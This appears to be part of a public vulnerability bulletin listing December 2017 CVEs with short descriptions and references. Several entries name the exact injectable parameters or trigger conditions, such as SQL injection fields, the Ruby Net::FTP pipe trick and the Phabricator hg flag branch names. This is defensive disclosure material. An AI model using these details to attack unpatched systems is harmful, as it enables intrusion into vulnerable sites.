Microsoft Office 2016 Click-to-Run (C2R) allows a remote code execution vulnerability due to the way files are handled in memory, aka "Microsoft Excel Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11935
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 
Microsoft Office 2016 Click-to-Run (C2R) allows an information disclosure vulnerability due to the way Microsoft Office enforces DRM copy/paste permissions, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11939
BID
SECTRACK
CONFIRM
microsoft -- office
 
Microsoft Office 2013 RT SP1, Microsoft Office 2013 SP1, and Microsoft Office 2016 allow an information disclosure vulnerability due to the way certain functions handle objects in memory, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11934
BID
SECTRACK
CONFIRM
microsoft -- sharepoint_enterprise_server_2016
 
Microsoft SharePoint Enterprise Server 2016 allows an elevation of privilege vulnerability due to the way web requests are handled, aka "Microsoft SharePoint Elevation of Privilege Vulnerability".2017-12-12not yet calculatedCVE-2017-11936
BID
SECTRACK
CONFIRM

microsoft -- windows

Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka "Windows RRAS Service Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11885
BID
SECTRACK
CONFIRM

microsoft -- windows

Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11886
BID
SECTRACK
CONFIRM
microsoft -- windows
 
Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka "Microsoft Windows Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11927
BID
SECTRACK
CONFIRM
mikrotik -- multiple_devices
 
MikroTik v6.40.5 devices allow remote attackers to cause a denial of service via a flood of ICMP packets.2017-12-13not yet calculatedCVE-2017-17538
EXPLOIT-DB
mikrotik -- routerboard
 
MikroTik RouterBOARD v6.39.2 and v6.40.5 allows an unauthenticated remote attacker to cause a denial of service by connecting to TCP port 53 and sending data that begins with many '\0' characters, possibly related to DNS.2017-12-13not yet calculatedCVE-2017-17537
EXPLOIT-DB
mobotap -- dolphin_browser_for_android
 
The Backup and Restore feature in Mobotap Dolphin Browser for Android 12.0.2 suffers from an arbitrary file write vulnerability when attempting to restore browser settings from a malicious Dolphin Browser backup file. This arbitrary file write vulnerability allows an attacker to overwrite a specific executable in the Dolphin Browser's data directory with a crafted malicious executable. Every time the Dolphin Browser is launched, it will attempt to run the malicious executable from disk, thus executing the attacker's code.2017-12-11not yet calculatedCVE-2017-17551
MISC
mobotap -- dolphin_browser_for_android
 
The Dolphin Browser for Android 12.0.2 suffers from an insecure parsing implementation of the Intent URI scheme. This vulnerability could allow attackers to abuse this implementation through a malicious Intent URI, in order to invoke private Activities within the Dolphin Browser.2017-12-11not yet calculatedCVE-2017-17553
MISC
nip2 -- nip2
 
** DISPUTED ** boxes.c in nip2 8.4.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer indicates that this product does not use the BROWSER environment variable.2017-12-14not yet calculatedCVE-2017-17514
MISC
node.js -- node.js
 
Node.js was affected by OpenSSL vulnerability CVE-2017-3737 in regards to the use of SSL_read() due to TLS handshake failure. The result was that an active network attacker could send application data to Node.js using the TLS or HTTP2 modules in a way that bypassed TLS authentication and encryption.2017-12-11not yet calculatedCVE-2017-15896
CONFIRM
node.js -- node.js
 
Node.js had a bug in versions 8.X and 9.X which caused buffers to not be initialized when the encoding for the fill value did not match the encoding specified. For example, 'Buffer.alloc(0x100, "This is not correctly encoded", "hex");' The buffer implementation was updated such that the buffer will be initialized to all zeros in these cases.2017-12-11not yet calculatedCVE-2017-15897
CONFIRM
ocaml -- ocaml_batteries_included
 
batteriesConfig.mlp in OCaml Batteries Included (aka ocaml-batteries) 2.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17519
MISC
octopus -- octopus_deploy
 
In Octopus Deploy before 4.1.3, the machine update process doesn't check that the user has access to all environments. This allows an access-control bypass because the set of environments to which a machine is scoped may include environments in which the user lacks access.2017-12-13not yet calculatedCVE-2017-17665
CONFIRM
openstack -- openstack
 
A resource-permission flaw was found in the openstack-tripleo-heat-templates package where ceph.client.openstack.keyring is created as world-readable. A local attacker with access to the key could read or modify data on Ceph cluster pools for OpenStack as though the attacker were the OpenStack service, thus potentially reading or modifying data in an OpenStack Block Storage volume.2017-12-12not yet calculatedCVE-2017-12155
CONFIRM
CONFIRM
palo_alto_networks -- globalprotect_agent
 
Palo Alto Networks GlobalProtect Agent before 4.0.3 allows attackers with administration rights on the local station to gain SYSTEM privileges via vectors involving "image path execution hijacking."2017-12-11not yet calculatedCVE-2017-15870
BID
CONFIRM
palo_alto_networks -- pan-os
 
The configuration file import for applications, spyware and vulnerability objects functionality in the web interface in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, and 7.1.x before 7.1.14 allows remote attackers to conduct server-side request forgery (SSRF) attacks and consequently obtain sensitive information via vectors related to parsing of external entities.2017-12-11not yet calculatedCVE-2017-15943
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.13, and 8.0.x before 8.0.6 allows remote attackers to cause a denial of service via vectors related to the management interface.2017-12-11not yet calculatedCVE-2017-15942
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
The web interface packet capture management component in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote authenticated users to execute arbitrary code via unspecified vectors.2017-12-11not yet calculatedCVE-2017-15940
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.2017-12-11not yet calculatedCVE-2017-15944
BID
SECTRACK
CONFIRM
panda_security -- panda_global_protection
 
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c04 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17684
MISC
panda_security -- panda_global_protection
 
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c44 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17683
MISC
pandora -- ios_app
 
Pandora iOS app prior to version 8.3.2 fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3194
BID
MISC
CERT-VN
MISC
pasdoc -- pasdoc
 
** DISPUTED ** delphi_gui/WWWBrowserRunnerDM.pas in PasDoc 0.14 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer has indicated that the code referencing the BROWSER environment variable is never used.2017-12-14not yet calculatedCVE-2017-17527
MISC
pcausa -- rawether_framework
 
PCAUSA Rawether framework does not properly validate BPF data, allowing a crafted malicious BPF program to perform operations on memory outside of its typical bounds on the driver's receipt of network packets. Local attackers can exploit this issue to execute arbitrary code with SYSTEM privileges.2017-12-15not yet calculatedCVE-2017-3196
MISC
BID
MISC
CERT-VN
phabricator -- phabricator
 
Phabricator before 2017-11-10 does not block the --config and --debugger flags to the Mercurial hg program, which allows remote attackers to execute arbitrary code by using the web UI to browse a branch whose name begins with a --config= or --debugger= substring.2017-12-11not yet calculatedCVE-2017-17536
MISC
MISC
phoenix_contact -- fl_comserver
 
A Cross-site Scripting issue was discovered in PHOENIX CONTACT FL COMSERVER BASIC 232/422/485, FL COMSERVER UNI 232/422/485, FL COMSERVER BAS 232/422/485-T, FL COMSERVER UNI 232/422/485-T, FL COM SERVER RS232, FL COM SERVER RS485, and PSI-MODEM/ETH (running firmware versions prior to 1.99, 2.20, or 2.40). The cross-site scripting vulnerability has been identified, which may allow remote code execution.2017-12-11not yet calculatedCVE-2017-16723
BID
MISC
MISC
phpscriptsmall.com -- advance_b2b_script
 
Advance B2B Script 2.1.3 has SQL Injection via the tradeshow-list-detail.php show_id or view-product.php pid parameter.2017-12-13not yet calculatedCVE-2017-17602
MISC
phpscriptsmall.com -- advance_online_learning_managment_script
 
Advance Online Learning Management Script 3.1 has SQL Injection via the courselist.php subcatid or popcourseid parameter.2017-12-13not yet calculatedCVE-2017-17599
MISC
phpscriptsmall.com -- advanced_real_estate_script
 
Advanced Real Estate Script 4.0.7 has SQL Injection via the search-results.php Projectmain, proj_type, searchtext, sell_price, or maxprice parameter.2017-12-13not yet calculatedCVE-2017-17603
MISC
phpscriptsmall.com -- advanced_world_database
 
Advanced World Database 2.0.5 has SQL Injection via the city.php country or state parameter, or the state.php country parameter.2017-12-13not yet calculatedCVE-2017-17640
MISC
phpscriptsmall.com -- affiliate_mlm_script
 
Affiliate MLM Script 1.0 has SQL Injection via the product-category.php key parameter.2017-12-13not yet calculatedCVE-2017-17598
MISC
phpscriptsmall.com -- basic_b2b_script
 
Basic B2B Script 2.0.8 has SQL Injection via the product_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17600
MISC
phpscriptsmall.com -- beauty_parlour_booking_script
 
Beauty Parlour Booking Script 1.0 has SQL Injection via the /list gender or city parameter.2017-12-13not yet calculatedCVE-2017-17595
MISC
phpscriptsmall.com -- cab_booking_script
 
Cab Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17601
MISC
phpscriptsmall.com -- car_rental_script
 
Car Rental Script 2.0.4 has SQL Injection via the countrycode1.php val parameter.2017-12-13not yet calculatedCVE-2017-17637
MISC
phpscriptsmall.com -- chartered_accountant_booking_script
 
Chartered Accountant Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17609
MISC
phpscriptsmall.com -- child_care_script
 
Child Care Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17608
MISC
phpscriptsmall.com -- cms_auditor_website
 
CMS Auditor Website 1.0 has SQL Injection via the PATH_INFO to /news-detail.2017-12-13not yet calculatedCVE-2017-17607
MISC
phpscriptsmall.com -- co-work_space_search_script
 
Co-work Space Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17606
MISC
phpscriptsmall.com -- consumer_complaints_clone_script
 
Consumer Complaints Clone Script 1.0 has SQL Injection via the other-user-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17605
MISC
phpscriptsmall.com -- doctor_search_script

 
Doctor Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17611
MISC
phpscriptsmall.com -- domainsale_php_script
 
DomainSale PHP Script 1.0 has SQL Injection via the domain.php id parameter.2017-12-13not yet calculatedCVE-2017-17594
MISC
phpscriptsmall.com -- e-commerce_mlm_software

 
E-commerce MLM Software 1.0 has SQL Injection via the service_detail.php pid parameter, event_detail.php eventid parameter, or news_detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17610
MISC
phpscriptsmall.com -- entrepreneur_bus_booking_script
 
Entrepreneur Bus Booking Script 3.0.4 has SQL Injection via the booker_details.php sourcebus parameter.2017-12-13not yet calculatedCVE-2017-17604
MISC
phpscriptsmall.com -- entrepreneur_dating_script
 
Entrepreneur Dating Script 2.0.1 has SQL Injection via the search_result.php marital, gender, country, or profileid parameter.2017-12-13not yet calculatedCVE-2017-17648
EXPLOIT-DB
phpscriptsmall.com -- entrepreneur_job_portal_script
 
Entrepreneur Job Portal Script 2.0.6 has SQL Injection via the jobsearch_all.php rid1 parameter.2017-12-13not yet calculatedCVE-2017-17596
MISC
phpscriptsmall.com -- event_search_script
 
Event Search Script 1.0 has SQL Injection via the /event-list city parameter.2017-12-13not yet calculatedCVE-2017-17616
MISC

phpscriptsmall.com -- facebook_clone_script


 
Facebook Clone Script 1.0 has SQL Injection via the friend-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17615
MISC
phpscriptsmall.com -- food_order_script

 
Food Order Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17614
MISC
phpscriptsmall.com -- foodspotting_clone_script
 
Foodspotting Clone Script 1.0 has SQL Injection via the quicksearch.php q parameter.2017-12-13not yet calculatedCVE-2017-17617
MISC
phpscriptsmall.com -- freelance_website_script

 
Freelance Website Script 2.0.6 has SQL Injection via the jobdetails.php pr_id parameter or the searchbycat_list.php catid parameter.2017-12-13not yet calculatedCVE-2017-17613
MISC
phpscriptsmall.com -- groupon_clone_script
 
Groupon Clone Script 3.01 has SQL Injection via the city_ajax.php state_id parameter.2017-12-13not yet calculatedCVE-2017-17638
MISC
phpscriptsmall.com -- hot_scripts_clone
 
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17612
MISC
phpscriptsmall.com -- kickstarter_clone_script
 
Kickstarter Clone Script 2.0 has SQL Injection via the investcalc.php projid parameter.2017-12-13not yet calculatedCVE-2017-17618
MISC
phpscriptsmall.com -- laundry_booking_script
 
Laundry Booking Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17619
MISC
MISC
phpscriptsmall.com -- lawyer_search_script
 
Lawyer Search Script 1.1 has SQL Injection via the /lawyer-list city parameter.2017-12-13not yet calculatedCVE-2017-17620
MISC
phpscriptsmall.com -- mlm_forced_matrix
 
MLM Forced Matrix 2.0.9 has SQL Injection via the news-detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17636
MISC
phpscriptsmall.com -- mlm_forex_market_plan_script
 
MLM Forex Market Plan Script 2.0.4 has SQL Injection via the news_detail.php newid parameter or the event_detail.php eventid parameter.2017-12-13not yet calculatedCVE-2017-17635
MISC
phpscriptsmall.com -- multiplex_movie_theater_booking_script
 
Multiplex Movie Theater Booking Script 3.1.5 has SQL Injection via the trailer-detail.php moid parameter, show-time.php moid parameter, or event-detail.php eid parameter.2017-12-13not yet calculatedCVE-2017-17633
MISC
phpscriptsmall.com -- multireligion_responsive_matrimonial
 
Multireligion Responsive Matrimonial 4.7.2 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17631
MISC
phpscriptsmall.com -- multivendor_penny_auction_clone_script
 
Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.2017-12-13not yet calculatedCVE-2017-17621
MISC
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
Muslim Matrimonial Script 3.02 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17639
MISC
phpscriptsmall.com -- nearbuy_clone_script
 
Nearbuy Clone Script 3.2 has SQL Injection via the category_list.php search parameter.2017-12-13not yet calculatedCVE-2017-17597
MISC
phpscriptsmall.com -- online_exam_test_application_script
 
Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.2017-12-13not yet calculatedCVE-2017-17622
MISC
MISC
phpscriptsmall.com -- opensource_classified_ads_script

 
Opensource Classified Ads Script 3.2 has SQL Injection via the advance_result.php keyword parameter.2017-12-13not yet calculatedCVE-2017-17623
MISC
phpscriptsmall.com -- php_multivendor_ecommerce
 
PHP Multivendor Ecommerce 1.0 has SQL Injection via the single_detail.php sid parameter, or the category.php searchcat or chid1 parameter.2017-12-13not yet calculatedCVE-2017-17624
MISC
phpscriptsmall.com -- professional_service_script
 
Professional Service Script 1.0 has SQL Injection via the service-list city parameter.2017-12-13not yet calculatedCVE-2017-17625
MISC
phpscriptsmall.com -- readymade_php_classified_script
 
Readymade PHP Classified Script 3.3 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17626
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script 3.2 has SQL Injection via the single-video-detail.php report_videos array parameter.2017-12-13not yet calculatedCVE-2017-17627
MISC
phpscriptsmall.com -- responsive_events_and_movie_ticket_booking_scriptResponsive Events And Movie Ticket Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17632
MISC
phpscriptsmall.com -- responsive_realestate_script
 
Responsive Realestate Script 3.2 has SQL Injection via the property-list tbud parameter.2017-12-13not yet calculatedCVE-2017-17628
MISC
phpscriptsmall.com -- resume_clone_script
 
Resume Clone Script 2.0.5 has SQL Injection via the preview.php id parameter.2017-12-13not yet calculatedCVE-2017-17641
MISC
phpscriptsmall.com -- secure_e-commerce_script
 
Secure E-commerce Script 2.0.1 has SQL Injection via the category.php searchmain or searchcat parameter, or the single_detail.php sid parameter.2017-12-13not yet calculatedCVE-2017-17629
MISC
phpscriptsmall.com -- single_theater_booking_script
 
Single Theater Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17634
MISC
phpscriptsmall.com -- yoga_class_script
 
Yoga Class Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17630
MISC
phusion_passenger -- phusion_passenger
 
In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is running as root, it is possible to list the contents of arbitrary files on a system by symlinking a file named REVISION from the application root folder to a file of choice and querying passenger-status --show=xml.2017-12-14not yet calculatedCVE-2017-16355
CONFIRM
CONFIRM
posty -- readymade_classifieds_script
 
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.2017-12-11not yet calculatedCVE-2017-17111
MISC
posty -- scubez_posty_readymade_classifieds
 
Scubez Posty Readymade Classifieds has SQL Injection via the admin/user_activate_submit.php ID parameter.2017-12-13not yet calculatedCVE-2017-17567
MISC
posty -- scubez_posty_readymade_classifieds
 
Scubez Posty Readymade Classifieds has XSS via the admin/user_activate_submit.php ID parameter.2017-12-13not yet calculatedCVE-2017-17569
MISC
posty -- scubez_posty_readymade_classifieds
 
Scubez Posty Readymade Classifieds has Incorrect Access Control for visiting admin/user_activate_submit.php (aka the backend PHP script), which might allow remote attackers to obtain sensitive information via a direct request.2017-12-13not yet calculatedCVE-2017-17568
MISC

ppm_2000 -- perspective_icm


 
Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation methods and missing cross server side checking mechanisms.2017-12-11not yet calculatedCVE-2017-11319
MISC
puppet -- puppet_enterprise
 
Cross-site scripting (XSS) vulnerability in the console in Puppet Enterprise before 2015.2.1 allows remote attackers to inject arbitrary web script or HTML via the string parameter, related to Login Redirect.2017-12-11not yet calculatedCVE-2015-6502
CONFIRM
puppet -- puppet_enterprise

 
The console in Puppet Enterprise 3.7.x, 3.8.x, and 2015.2.x does not set the secure flag for the JSESSIONID cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.2017-12-11not yet calculatedCVE-2015-8470
CONFIRM
puppet -- puppetlabs-apache
 
The default vhost configuration file in Puppet before 3.6.2 does not include the SSLCARevocationCheck directive, which might allow remote attackers to obtain sensitive information via a revoked certificate when a Puppet master runs with Apache 2.4.2017-12-11not yet calculatedCVE-2014-3250
CONFIRM
CONFIRM
python -- python
 
Lib/webbrowser.py in Python through 3.6.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17522
MISC
qnap -- qsync_for_windows
 
A DLL Hijacking vulnerability in QNAP Qsync for Windows (exe) version 4.2.2.0724 and earlier could allow remote attackers to execute arbitrary code on Windows machines.2017-12-11not yet calculatedCVE-2017-13070
CONFIRM
qt_company -- qt_for_android
 
A vulnerability in applications created using Qt for Android prior to 5.9.3 allows attackers to alter environment variables via unspecified vectors.2017-12-15not yet calculatedCVE-2017-10905
CONFIRM
JVN
qt_company -- qt_for_android
 
Qt for Android prior to 5.9.0 allows remote attackers to execute arbitrary OS commands via unspecified vectors.2017-12-15not yet calculatedCVE-2017-10904
CONFIRM
JVN
radware -- alteon_devices
 
Radware Alteon devices with a firmware version between 31.0.0.0-31.0.3.0 are vulnerable to an adaptive-chosen ciphertext attack ("Bleichenbacher attack"). This allows an attacker to decrypt observed traffic that has been encrypted with the RSA cipher and to perform other private key operations.2017-12-13not yet calculatedCVE-2017-17427
BID
MISC
CONFIRM
CERT-VN
rapid7 -- nexpose
 
Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.2017-12-14not yet calculatedCVE-2017-5264
CONFIRM
reddit -- reddit_terminal_viewer
 
scripts/inspect_webbrowser.py in Reddit Terminal Viewer (RTV) 1.19.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17516
MISC
ruby -- ruby
 
Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution.2017-12-15not yet calculatedCVE-2017-17405
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
 
Cross-Site Scripting (XSS) vulnerability in SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, 4.30, as user controlled inputs are not sufficiently encoded.2017-12-12not yet calculatedCVE-2017-16681
BID
CONFIRM
CONFIRM
sap -- business_intelligence_promotion_management_application
 
SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, and 4.30, does not perform authentication checks for functionalities that require user identity.2017-12-12not yet calculatedCVE-2017-16684
BID
CONFIRM
CONFIRM
sap -- business_objects_platform
 
Denial of Service (DOS) in SAP Business Objects Platform, Enterprise 4.10 and 4.20, that could allow an attacker to prevent legitimate users from accessing a service.2017-12-12not yet calculatedCVE-2017-16683
BID
CONFIRM
CONFIRM
sap -- business_warehouse_universal_data_integration
 
Cross-Site scripting (XSS) in SAP Business Warehouse Universal Data Integration, from 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, due to insufficient encoding of user controlled inputs.2017-12-12not yet calculatedCVE-2017-16685
BID
CONFIRM
CONFIRM
sap -- hana
 
The user self-service tools of SAP HANA extended application services, classic user self-service, a part of SAP HANA Database versions 1.00 and 2.00, can be misused to enumerate valid and invalid user accounts. An unauthenticated user could use the error messages to determine if a given username is valid.2017-12-12not yet calculatedCVE-2017-16687
BID
CONFIRM
CONFIRM
sap -- hana
 
Two potential audit log injections in SAP HANA extended application services 1.0, advanced model: 1) Certain HTTP/REST endpoints of controller service are missing user input validation which could allow unprivileged attackers to forge audit log lines. Hence the interpretation of audit log files could be hindered or misdirected. 2) User Account and Authentication writes audit logs into syslog and additionally writes the same audit entries into a log file. Entries in the log file miss escaping. Hence the interpretation of audit log files could be hindered or misdirected, while the entries in syslog are correct.2017-12-12not yet calculatedCVE-2017-16680
BID
CONFIRM
CONFIRM
sap -- kernel
 
A Trusted RFC connection in SAP KERNEL 32NUC, SAP KERNEL 32Unicode, SAP KERNEL 64NUC, SAP KERNEL 64Unicode 7.21, 7.21EXT, 7.22, 7.22EXT; SAP KERNEL from 7.21 to 7.22, 7.45, 7.49, can be established to a different client or a different user on the same system, although no explicit Trusted/Trusting Relation to the same system has been defined.2017-12-12not yet calculatedCVE-2017-16689
BID
CONFIRM
CONFIRM
sap -- netweaver_internet_transaction_server
 
SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application.2017-12-12not yet calculatedCVE-2017-16682
BID
CONFIRM
CONFIRM
sap -- netweaver_knowledge_management_configuration_service
 
Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application.2017-12-12not yet calculatedCVE-2017-16678
BID
CONFIRM
CONFIRM
sap -- note_assistant_tool
 
SAP Note Assistant tool (SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31,7.40, from 7.50 to 7.52) supports upload of digitally signed note file of type 'SAR'. The digital signature verification is done together with the extraction of note file contained in the SAR archive. It is possible to append a tampered file to the SAR archive using SAPCAR tool and during the extraction, digital signature verification fails but the tampered file is extracted.2017-12-12not yet calculatedCVE-2017-16691
CONFIRM
CONFIRM
sap -- plant_connectivity
 
A malicious DLL preload attack possible on NwSapSetup and Installation self-extracting program for SAP Plant Connectivity 2.3 and 15.0. It is possible that SAPSetup / NwSapSetup.exe loads system DLLs like DWMAPI.dll (located in your Syswow64 / System32 folder) from the folder the executable is in and not from the system location. The desired behavior is that system dlls are only loaded from the system folders. If a dll with the same name as the system dll is located in the same folder as the executable, this dll is loaded and code is executed.2017-12-12not yet calculatedCVE-2017-16690
BID
CONFIRM
CONFIRM
sap -- startup_service
 
URL redirection vulnerability in SAP's Startup Service, SAP KERNEL 32 NUC, SAP KERNEL 32 Unicode, SAP KERNEL 64 NUC, SAP KERNEL 64 Unicode 7.21, 7.21EXT, 7.22 and 7.22EXT; SAP KERNEL 7.21, 7.22, 7.45, 7.49 and 7.52, that allows an attacker to redirect users to a malicious site.2017-12-12not yet calculatedCVE-2017-16679
BID
CONFIRM
CONFIRM
scummvm -- scummvm
 
backends/platform/sdl/posix/posix.cpp in ScummVM 1.9.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17528
MISC
seacms -- seacms
 
SeaCMS 6.56 allows remote authenticated administrators to execute arbitrary PHP code via a crafted token field to admin/admin_ping.php, which interacts with data/admin/ping.php.2017-12-12not yet calculatedCVE-2017-17561
MISC
MISC
sensible-utils -- sensible-utils
 
sensible-browser in sensible-utils before 0.0.11 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17512
MISC
MISC
sinology -- mailplus_server
 
Cross-site scripting (XSS) vulnerability in Disclaimer in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary web script or HTML via the NAME parameter.2017-12-15not yet calculatedCVE-2017-15890
CONFIRM
swi-prolog -- swi-prolog
 
library/www_browser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17524
MISC
sylpheed -- sylpheed
 
libsylph/utils.c in Sylpheed through 3.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17517
MISC
symantec -- norton_family_android_app
 
Prior to 4.4.1.10, the Norton Family Android App can be susceptible to an Information Disclosure issue. Information disclosure is a very common issue that attackers will attempt to exploit as a first pass across the application. As they probe the application they will take note of anything that may seem out of place or any bit of information they can use to their advantage such as error messages, system information, user data, version numbers, component names, URL paths, or even simple typos and misspellings.2017-12-13not yet calculatedCVE-2017-15530
BID
CONFIRM
symantec -- norton_family_android_app
 
Prior to 4.4.1.10, the Norton Family Android App can be susceptible to a Denial of Service (DoS) exploit. A DoS attack is a type of attack whereby the perpetrator attempts to make a particular device unavailable to its intended user by temporarily or indefinitely disrupting services of a specific host within a network.2017-12-13not yet calculatedCVE-2017-15529
BID
CONFIRM
synaptics -- touchpad_drivers
 
A debug tool in Synaptics TouchPad drivers allows local users with administrative access to obtain sensitive information about keyboard scan codes by modifying registry keys.2017-12-15not yet calculatedCVE-2017-17556
HP
CONFIRM
MISC
techno -- portfolio_management_panel
 
Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request.2017-12-11not yet calculatedCVE-2017-17110
MISC
techno -- portfolio_management_panel
 
Techno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter.2017-12-15not yet calculatedCVE-2017-17695
MISC
techno -- portfolio_management_panel
 
Techno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php.2017-12-15not yet calculatedCVE-2017-17696
MISC
